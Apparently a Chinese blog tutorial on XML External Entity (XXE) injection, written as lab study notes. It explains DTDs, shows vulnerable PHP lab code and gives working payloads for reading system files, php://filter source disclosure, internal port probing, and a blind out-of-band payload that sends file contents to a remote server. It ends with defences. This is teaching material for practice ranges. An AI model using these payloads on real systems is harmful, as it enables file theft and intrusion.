



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="https://sun-spots.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="https://sun-spots.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="https://sun-spots.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="https://sun-spots.github.io/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/XXE/">



  <title>
 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 6.0.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2022-03-08 15:25:47">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2022-03-08T15:25:47+08:00">2022-03-08</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicliierfjj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicitf0kl1j20zk0m87fe.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicitspjpbj20zk0m81ky.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipesrnqv3j20zk0m8ava.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1giclfdu6exj20zk0m87hw.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipexe4oykj20zk0m87ji.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://sun-spots.github.io/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/XXE/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="第五天xxe实体注入"><a class="markdownIt-Anchor" href="#第五天xxe实体注入">#</a> 第五天：XXE 实体注入</h1>
<h1 id="xxe-漏洞描述"><a class="markdownIt-Anchor" href="#xxe-漏洞描述">#</a> xxe 漏洞描述</h1>
<p>XML 外部实体注入（XML External Entity）简称 XXE 漏洞，XML 用于标记电子文件使其具有结构性的标记 语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML 文档结构包括 XML 声明、DTD 文档类型定义（可选）、文档元素，目前，XML 文件作为配置文件（Spring、Struts2 等）、文档结构说明文件（PDF、RSS 等）、图片格式文件（SVG header）应用比较广泛。 XML 的语法规范由 DTD （Document Type Definition）来进行控制；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631778874756-efaa2d3b-a031-40ef-bf4d-ee8e668a2c37.png" alt="img"></p>
<p>》》》什么是 XXE 漏洞《《《</p>
<p>XXE 漏洞发生在应用程序解析 XML 输入时，<strong>没有禁止外部实体的加载</strong>，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害的漏洞…</p>
<p>》》》XXE 漏洞挖掘《《《</p>
<p>XXE 漏洞的判定：正常情况下，XXE 漏洞的判定需要走如下的流程</p>
<p>第一：检测 XML 是否会被成功解析</p>
<p>第二：检测服务器是否支持 DTD 引用外部实体</p>
<p>但实际操作过程中，一般都是直接抓包看有没有使用 XML, 有就是直接往外部实体上套一下试试，没有一般我就过了 (原谅我，毕竟我是菜鸡 ==)</p>
<p>XXE 漏洞的危害：XXE 漏洞一般其的多是辅助拿 shell 的功能，也就是文件读取 (用的比较多)…</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!--文档类型定义--&gt;</span><br><span class="line">&lt;!DOCTYPE note [ &lt;!--定义此文档是 note 类型的文档--&gt;</span><br><span class="line">&lt;!ELEMENT note (to,from,heading,body)&gt; &lt;!--定义 note 元素有四个元素--&gt;</span><br><span class="line">&lt;!ELEMENT to (#PCDATA)&gt; &lt;!--定义 to 元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT from (#PCDATA)&gt; &lt;!--定义 from 元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT head (#PCDATA)&gt; &lt;!--定义 head 元素为”#PCDATA”类型--&gt;</span><br><span class="line">&lt;!ELEMENT body (#PCDATA)&gt; &lt;!--定义 body 元素为”#PCDATA”类型--&gt;</span><br><span class="line">]]]&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;!--文档元素--&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line">&lt;to&gt;Dave&lt;/to&gt;</span><br><span class="line">&lt;from&gt;Tom&lt;/from&gt;</span><br><span class="line">&lt;head&gt;Reminder&lt;/head&gt;</span><br><span class="line">&lt;body&gt;You are a good man&lt;/body&gt;</span><br><span class="line">&lt;/note&gt;</span><br></pre></td></tr></table></figure>
<p><strong>PCDATA</strong></p>
<p>​	PCDATA 的意思是被解析的字符数据（parsed character data）。</p>
<p>​	可把字符数据想象为 XML 元素的开始标签与结束标签之间的文本，PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记，文本中的标签会被当作标记来处理，而实体会被展开。</p>
<p>不过，被解析的字符数据不应当包含任何 &amp;、&lt;或者&gt; 字符；需要使用 &amp;、&lt; 以及 &gt; 实体来分别替换它们；</p>
<p><strong>CDATA</strong></p>
<p>CDATA 的意思是字符数据（character data）。</p>
<p>CDATA 是不会被解析器解析的文本。在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开；</p>
<p>常见的 XML 语法结构：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--XML 申明--&gt;</span><br><span class="line">其中，文档定义类型（DTD）可以是内部声明也可以引用外部 DTD</span><br><span class="line"></span><br><span class="line">内部声明 DTD 格式：&lt;!DOCTYPE 根元素 [元素声明]&gt;</span><br><span class="line">引用外部 DTD 格式：&lt;!DOCTYPE 根元素 SYSTEM “文件名”&gt;   </span><br><span class="line"></span><br><span class="line">在 DTD 中进行实体说明时，将使用 ENTITY 关键字来声明。实体是用于定义引用普通文本或特殊字符的快捷</span><br><span class="line">方式的变量。实体可在内部或外部进行声明;</span><br><span class="line"></span><br><span class="line">内部声明实体格式：&lt;!ENTITY 实体名称 “实体的值”&gt;</span><br><span class="line">引用外部实体格式：&lt;!ENTITY 实体名称 SYSTEM “URI”&gt;</span><br></pre></td></tr></table></figure>
<p><strong>实体：</strong></p>
<p>实体是对数据的引用；根据实体种类的不同，XML 解析器将使用实体的替代文本或者外部文档的内容来替代实体引用，它主要分为以下四类：</p>
<ul>
<li>
<ul>
<li>内置实体 (Built-in entities)</li>
<li>字符实体 (Character entities)</li>
</ul>
</li>
<li>
<ul>
<li>通用实体 (General entities)</li>
<li>参数实体 (Parameter entities)</li>
</ul>
</li>
</ul>
<p>参数实体用 **% 实体名称 ** 申明，引用时也用 % 实体名称；</p>
<p>其余实体直接用实体名称申明，引用时用用实体名称；</p>
<p><strong>参数实体</strong>只能在 DTD 中申明，DTD 中引用；</p>
<p>其余实体只能在 DTD 中申明，可在 xml 文档中引用。</p>
<p>注意：参数实体是在 DTD 中被引用的，而其余实体是在 xml 文档中被引用的，另外定义义 % 后面跟空格。</p>
<p>DTD 中的一些重要的关键字：</p>
<ul>
<li>
<ul>
<li>DOCTYPE（DTD 的声明）</li>
<li>ENTITY（实体的声明）</li>
</ul>
</li>
<li>
<ul>
<li>SYSTEM、PUBLIC（外部资源申请）</li>
</ul>
</li>
</ul>
<p>内部实体声明：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY 实体名称 “实体的值”&gt;</span><br><span class="line"></span><br><span class="line">		一个实体由三部分构成: &amp;符号, 实体名称, 分号 (;)，这里&amp;不论在GET还是在POST中都需要进行URL编码，因为是使用参数传入xml的，&amp;符号会被认为是参数间的连接符号，示例：</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE foo [</span><br><span class="line">&lt;!ELEMENT foo ANY &gt;</span><br><span class="line">&lt;!ENTITY xxe &quot;Thinking&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</span><br></pre></td></tr></table></figure>
<p>外部实体声明：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">		XML中对数据的引用称为实体，实体中有一类叫外部实体，用来引入外部资源，有SYSTEM和PUBLIC两个关键字，表示实体来自本地计算机还是公共计算机，外部实体的引用可以借助各种协议，比如以下三种：</span><br><span class="line"></span><br><span class="line">file:///path/to/file.ext</span><br><span class="line">http://url</span><br><span class="line">php://filter/read=convert.base64-encode/resource=conf.php</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE foo [</span><br><span class="line">&lt;!ELEMENT foo ANY &gt;</span><br><span class="line">&lt;!ENTITY xxe SYSTEM “URI/URL”&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</span><br><span class="line"></span><br><span class="line">外部实体示例：</span><br><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE methodname [</span><br><span class="line">&lt;!ELEMENT methodname ANY &gt;</span><br><span class="line">&lt;!ENTITY xxe(实体引用名) SYSTEM &quot;file:///etc/passwd&quot;(实体内容) &gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;methodname&gt;&amp;xxe;&lt;/methodname&gt;</span><br><span class="line"></span><br><span class="line">	这种写法调用了本地计算机的文件/etc/passwd，XML内容被解析后，文件内容便通过&amp;xxe被存放在了methodname元素中，造成了敏感信息的泄露。</span><br></pre></td></tr></table></figure>
<p>参数实体格式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % 实体名称 &quot;实体的值&quot;&gt;或&lt;!ENTITY % 实体名称 SYSTEM &quot;URI&quot;&gt;</span><br><span class="line"></span><br><span class="line">参数实体示例：</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE foo [</span><br><span class="line">&lt;!ELEMENT foo ANY &gt;</span><br><span class="line">&lt;!ENTITY  % xxe SYSTEM &quot;http://xxx.xxx.xxx/evil.dtd&quot; &gt;</span><br><span class="line">%xxe;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;foo&gt;&amp;evil;&lt;/foo&gt;</span><br><span class="line"></span><br><span class="line">外部evil.dtd中的内容：</span><br><span class="line"></span><br><span class="line">&lt;!ENTITY evil  &quot;file:///c:/windows/win.ini&quot; &gt;</span><br><span class="line"></span><br><span class="line">引用公共实体</span><br><span class="line"> </span><br><span class="line">&lt;!ENTITY 实体名称 PUBLIC &quot;public_ID&quot; &quot;URI/URL&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>由于 xxe 漏洞主要是利用了 DTD 引用外部实体导致的漏洞，那么重点看下能引用哪些类型的外部实体。当 libXML2 &lt; libxml2.9 才会造成外部注入漏洞；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631779577152-db18c769-afdb-4aa3-b7f6-16c2aea6eee3.png" alt="img"></p>
<p>语法引用外部的实体，而非内部实体，那么 URI 中能写哪些类型的外部实体呢？</p>
<p>主要的有 file、http、https、ftp 等等，当然不同的程序支持的不一样：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631779662946-09448010-78c5-4e7a-a964-d8294b5015c2.png" alt="img"></p>
<h1 id="xxe-漏洞代码分析-1"><a class="markdownIt-Anchor" href="#xxe-漏洞代码分析-1">#</a> xxe 漏洞代码分析 1</h1>
<p>环境：</p>
<p>皮卡丘靶场 xxe 漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_POST[&#x27;submit&#x27;]) and $_POST[&#x27;xml&#x27;] != null)&#123;</span><br><span class="line">    $xml =$_POST[&#x27;xml&#x27;];</span><br><span class="line">				//$xml = $test;</span><br><span class="line">    $data = @simplexml_load_string($xml,&#x27;SimpleXMLElement&#x27;,LIBXML_NOENT);</span><br><span class="line">    if($data)&#123;</span><br><span class="line">        $html.=&quot;&lt;pre&gt;&#123;$data&#125;&lt;/pre&gt;&quot;;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        $html.=&quot;&lt;p&gt;XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?&lt;/p&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">simplexml_load_string() 函数把 XML 字符串载入对象中；</span><br><span class="line">获取 post 的 xml 文件 传递到 simplexml_load_string 再进行输出会遭成 xxe 注入；</span><br><span class="line">测试语句，可以判断是否有xxe漏洞，如果返回了xxe就是有：</span><br><span class="line">	&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE a [&lt;!ENTITY b &quot;xxe&quot;&gt;]&gt;&lt;c&gt;&amp;b;&lt;/c&gt;</span><br></pre></td></tr></table></figure>
<p>读取敏感文件的 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version = &quot;1.0&quot;?&gt; </span><br><span class="line">&lt;!DOCTYPE ANY [ &lt;!ENTITY f SYSTEM &quot;file:///C:/Windows/win.ini&quot;&gt; ]&gt; </span><br><span class="line">&lt;x&gt;&amp;f;&lt;/x&gt;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631781377729-0fa4593c-1c62-4cf8-be28-35fceea1c9bf.png" alt="img"></p>
<h1 id="xxe-漏洞代码分析-2"><a class="markdownIt-Anchor" href="#xxe-漏洞代码分析-2">#</a> xxe 漏洞代码分析  2</h1>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$string_xml = &#x27;&lt;?xml version=&quot;1.0&quot;</span><br><span class="line">encoding=&quot;GB18030&quot;?&gt;&lt;note&gt;&lt;to&gt;George&lt;/to&gt;&lt;from&gt;John&lt;/from&gt;&lt;heading&gt;Reminder&lt;/heading&gt;&lt;body&gt;xml</span><br><span class="line">实体注入&lt;/body&gt;&lt;/note&gt;&#x27;;</span><br><span class="line">$xml = isset($_GET[&#x27;xml&#x27;])?$_GET[&#x27;xml&#x27;]:$string_xml;</span><br><span class="line">$data = simplexml_load_string($xml);</span><br><span class="line">echo &#x27;&lt;meta charset=&quot;GB18030&quot;&gt;&#x27;;</span><br><span class="line">print_r($data);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">获取 xml 变量 创建 dom 对象 转入 xml 进行处理输出;</span><br><span class="line">simplexml_load_string() 函数把 XML 字符串载入对象中;</span><br></pre></td></tr></table></figure>
<h2 id="有回显"><a class="markdownIt-Anchor" href="#有回显">#</a> 有回显</h2>
<h3 id="xxe-漏洞常用利用如下"><a class="markdownIt-Anchor" href="#xxe-漏洞常用利用如下">#</a> xxe 漏洞常用利用如下</h3>
<h4 id="读取敏感文件"><a class="markdownIt-Anchor" href="#读取敏感文件">#</a> 读取敏感文件</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE a [&lt;!ENTITY b SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;c&gt;&amp;b;&lt;/c&gt;</span><br><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE a [&lt;!ENTITY b SYSTEM &quot;file:///C:/Windows/win.ini&quot;&gt;]&gt;&lt;c&gt;&amp;b;&lt;/c&gt;</span><br><span class="line"></span><br><span class="line">注意payload做url编码</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631783132155-05ab71be-93a6-4c60-b770-a149d4c99fd7.png" alt="img"></p>
<h4 id="使用-php-伪协议-phpfilter-读取文件"><a class="markdownIt-Anchor" href="#使用-php-伪协议-phpfilter-读取文件">#</a> 使用 php 伪协议 php://filter 读取文件</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE xdsec [</span><br><span class="line">&lt;!ELEMENT methodname ANY &gt;</span><br><span class="line">&lt;!ENTITY xxe SYSTEM &quot;php://filter/read=convert.base64-encode/resource=phpinfo.php&quot; &gt;]&gt;</span><br><span class="line">&lt;methodcall&gt;</span><br><span class="line">&lt;methodname&gt;&amp;xxe;&lt;/methodname&gt;</span><br><span class="line">&lt;/methodcall&gt;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631783413804-1e2a36e5-065b-4ff8-a9e7-c1877ab44a17.png" alt="img"></p>
<h4 id="扫描内网和端口"><a class="markdownIt-Anchor" href="#扫描内网和端口">#</a> 扫描内网和端口</h4>
<p>通过扫描 ip 和端口确定内网机器的 ip 和端口开发情况，访问端口会获取 baner 信息；</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line">&lt;!ENTITY test SYSTEM &quot;http://127.0.0.1:80&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;abc&gt;&amp;test;&lt;/abc&gt;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631784028958-308bd616-603d-4392-904a-d5c9672d8be6.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631784046052-f21f9f2b-01a9-4c2f-9516-5efcfecd8f8a.png" alt="img"></p>
<h2 id="无回显"><a class="markdownIt-Anchor" href="#无回显">#</a> 无回显</h2>
<p>blind xxe （盲注）可以使用外带数据通道，提取数据 ；</p>
<p>环境：blindxxe.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$string_xml = &#x27;&lt;?xml version=&quot;1.0&quot;</span><br><span class="line">encoding=&quot;GB18030&quot;?&gt;&lt;note&gt;&lt;to&gt;George&lt;/to&gt;&lt;from&gt;John&lt;/from&gt;&lt;heading&gt;Reminder&lt;/heading&gt;&lt;body&gt;xml</span><br><span class="line">实体注入&lt;/body&gt;&lt;/note&gt;&#x27;;</span><br><span class="line">$xml = isset($_GET[&#x27;xml&#x27;])?$_GET[&#x27;xml&#x27;]:$string_xml;</span><br><span class="line">$data = simplexml_load_string($xml);</span><br><span class="line">echo &#x27;&lt;meta charset=&quot;GB18030&quot;&gt;&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631784992303-c1277cfd-5c4f-4210-9b36-8261a70b3ef3.png" alt="img"></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY[</span><br><span class="line">&lt;!ENTITY % file SYSTEM &quot;file:///C:/1.txt&quot;&gt;</span><br><span class="line">&lt;!ENTITY % remote SYSTEM &quot;http://192.168.50.237/evil.xml&quot;&gt;</span><br><span class="line">%remote;</span><br><span class="line">%all;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;root&gt;&amp;send;&lt;/root&gt;</span><br><span class="line"></span><br><span class="line">读取本地的C:/1.txt文件，发送给http://192.168.50.237/evil.xml</span><br><span class="line">evil.xml 文件内容：</span><br><span class="line"></span><br><span class="line">	&lt;!ENTITY % all &quot;&lt;!ENTITY send SYSTEM &#x27;http://192.168.50.237/1.php?file=%file;&#x27;&gt;&quot;&gt;</span><br><span class="line"></span><br><span class="line">1.php内容：</span><br><span class="line">	</span><br><span class="line">	&lt;?php file_put_contents(&quot;1.txt&quot;, $_GET[&#x27;file&#x27;]); ?&gt;</span><br></pre></td></tr></table></figure>
<p>文件写入成功。获取 1.txt 内容；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1631785963765-c36abb23-76d5-42d2-8fea-a7491483ac96.png" alt="img"></p>
<h1 id="xxe-防御方案"><a class="markdownIt-Anchor" href="#xxe-防御方案">#</a> xxe 防御方案</h1>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.使用开发语言提供的禁用外部实体的方法:</span><br><span class="line">		PHP：</span><br><span class="line">			libxml_disable_entity_loader(true);</span><br><span class="line">		JAVA:</span><br><span class="line">			DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();</span><br><span class="line">			dbf.setExpandEntityReferences(false);</span><br><span class="line">		Python：</span><br><span class="line">			from lxml import etree</span><br><span class="line">			xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))</span><br><span class="line"></span><br><span class="line">2.过滤用户提交的 XML 数据:</span><br><span class="line">		关键词：&lt;!DOCTYPE 和&lt;!ENTITY，或者，SYSTEM 和 PUBLIC</span><br><span class="line"></span><br><span class="line">3.升级 libxml 组件</span><br></pre></td></tr></table></figure>
<h1 id="xxe-lab-for-php"><a class="markdownIt-Anchor" href="#xxe-lab-for-php">#</a> XXE-Lab for PHP</h1>
<p>XXE-lab 是一个一个包含 php,java,python,C# 等各种语言版本的 XXE 漏洞靶场…</p>
<p>》》》靶场部署《《《</p>
<p>步骤一：将靶场进行下载…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/c0ny1/xxe-lab</span><br></pre></td></tr></table></figure>
<p>步骤二：将 PHPStudy 的中间件与版本信息调制为 <code>php-5.4.29+Apache</code>  访问以下地址开始练习…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.84/xxelabs/php_xxe/</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714272075-d5c881f8-1c99-475f-bcff-2956d059b29f.png" alt="img"></p>
<h3 id="一有回显的xxe"><a class="markdownIt-Anchor" href="#一有回显的xxe">#</a> 一：有回显的 XXE</h3>
